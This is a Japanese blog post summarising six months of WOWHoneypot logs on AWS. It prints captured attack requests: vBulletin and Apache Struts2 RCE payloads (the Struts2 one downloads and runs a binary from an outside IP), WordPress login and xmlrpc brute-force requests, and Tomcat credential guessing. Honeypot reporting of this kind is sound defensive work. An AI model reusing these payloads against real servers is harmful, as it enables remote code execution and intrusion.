思えば、WOWHoneypotをAWSに栽培してから6ヶ月が経ち、そこそこのログも貯まってきました。
最初は毎日を目標に集計していましたが、ちょっと。。。さぼ。。。さぼってしまい。。。
ちょくちょくログ見てはいましたがきちんと集計、分析するということはしておりませんでした。
ということで、区切りとしては微妙な月ですが、半年分の検知傾向をちょっとまとめてみようと思います。
※ちなみにAWSリージョンは東京のみ。
■6月〜11月検知の総評
7月の検知数が10000件以上と突出しており、次いで6月と9月が8000件を超えていました。
10月、11月は減少傾向にありました。
全期間通して見ると、以下のURLパスへのリクエストは一貫して多数検知する傾向がありました。
・/manager/html
・/
・/is_test
また検知数が多かった月においては以下のような特徴が見られました。
■月ごと検知傾向
ここでは各月で特に検知が目立った通信、ピックアップしたい通信を挙げていきます。
・6月
送信元IPアドレス:106.13.39.229 (中国)
通信内容:vBulletinの脆弱性(CVE-2019-16759)を狙った通信などを検知
POST /forums.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Host: [server ip] Content-Length: 103 Connection: Keep-Alive Cache-Control: no-cache epass=2dmfrb28nu3c6s9j&routestring=ajax/render/widget_php&widgetConfig[code]=die(@md5(HellovBulletin));
※ vBulletinの脆弱性(CVE-2019-16759)について
https://www.exploit-db.com/exploits/47447
https://unit42.paloaltonetworks.jp/exploits-in-the-wild-for-vbulletin-pre-auth-rce-vulnerability-cve-2019-16759/
・7月
送信元IPアドレス:159.203.36.107(カナダ)、94.23.222.147(フランス)など、複数
通信内容:下記URLパスへのアクセス急増
・/wp-login.php (WordPressの管理者ログイン画面へのアクセス)
・/xmlrpc.php (WordpressのXML-RPC機能の悪用の試み)
POST /wp-login.php HTTP/1.1 Host: [server ip] User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0 Content-Length: 96 Content-Type: application/x-www-form-urlencoded Cookie: wordpress_test_cookie=WP+Cookie+check Accept-Encoding: gzip Connection: close log=&pwd=admin123456789&wp-submit=Log In&redirect_to=http://[server ip]/wp-admin/&testcookie=1
POST /xmlrpc.php HTTP/1.1 Host: [server ip] User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0 Content-Length: 473 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip Connection: close <?xml version="1.0"?><methodCall><methodName>system.multicall</methodName><params><param><value><array><data><value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>admin</string></value><value><string></string></value></data></array></value></data></array></value></member></struct></value></data></array></value></param></params></methodCall>
・8月
送信元IPアドレス:222.89.70.216 (中国)、222.89.70.208 (中国)
通信内容:Apache Struts2の脆弱性(CVE-2019-0230など)を狙った通信が急増
GET /index.action HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Accept: */*
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cd /tmp;wget hxxp://43.226.147.250:968/sdb;chmod 777 sdb;./sdb').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
Host: [server ip]:8080※Apache Struts2の脆弱性(CVE-2019-0230)について
https://www.jpcert.or.jp/at/2020/at200034.html
https://www.exploit-db.com/exploits/49068
・9月
送信元IPアドレス:89.40.73.127 (ルーマニア)
通信内容:Apache Tomcatの管理画面(/manager/html)に対して、Authorizationヘッダ付きでログインを試みる通信を多数検知
=========================== [2020-09-10 01:34:18+0900] : 89.40.73.127 GET /manager/html HTTP/1.1 Content-Type: application/x-www-form-urlencoded Authorization: Basic cm9vdDpQQHNzd29yZCEhIQ== Host: [server ip]:8080 =========================== [2020-09-10 01:34:19+0900] : 89.40.73.127 GET /manager/html HTTP/1.1 Content-Type: application/x-www-form-urlencoded Authorization: Basic cm9vdDpQQHNzd29yZF8xMjM= Host: [server ip]:8080 ===========================
・11月
送信元IPアドレス:178.237.237.29 (スペイン)、180.180.53.252 (タイ)など多数
通信内容:NetgearのRCEの脆弱性(/currentsetting.htm)を狙った通信が急増
GET /currentsetting.htm HTTP/1.1 Host: [server ip]
※Netgearの脆弱性について
https://www.exploit-db.com/exploits/48588
送信元IPアドレス:91.241.19.84 (ロシア)
通信内容:/console/アクセスを検知への急増、Oracle WebLogic Serverの脆弱性を狙う探索活動と思われる。
GET /console/ HTTP/1.1 Host: [server ip]:80 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Accept-Encoding: gzip Connection: close
※Oracle WebLogic Serverの脆弱性について
https://www.jpcert.or.jp/at/2020/at200040.html
https://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html
■まとめ
流石に全ては見きれなかったので、検知数が目立ったり流行りだったりの通信をピックアップしてまとめてみました。
少しでも参考になれば幸いです。
やっぱり半年に一回くらいはこれくらいがっつりやりたいな!笑
